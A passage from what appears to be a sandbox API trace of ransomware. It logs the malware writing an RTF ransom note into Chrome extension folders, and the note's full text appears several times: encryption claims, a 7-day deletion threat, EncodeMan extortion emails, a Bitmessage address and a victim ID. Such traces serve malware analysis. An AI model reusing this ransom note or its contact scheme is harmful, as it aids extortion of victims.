ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.157] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x23731c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nGé(²S#JÊé¶\x8a\x16Cµ\x81¬O]S\x0cð\x92/£\x01", lpUsedDefaultChar=0x0) returned 8717 [0297.157] WriteFile (in: hFile=0x2cc, lpBuffer=0x23731c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x23731c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0297.158] CloseHandle (hObject=0x2cc) returned 1 [0297.158] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\#readme_eman#.rtf")) returned 0xffffffff [0297.158] GetLastError () returned 0x2 [0297.158] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0297.160] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 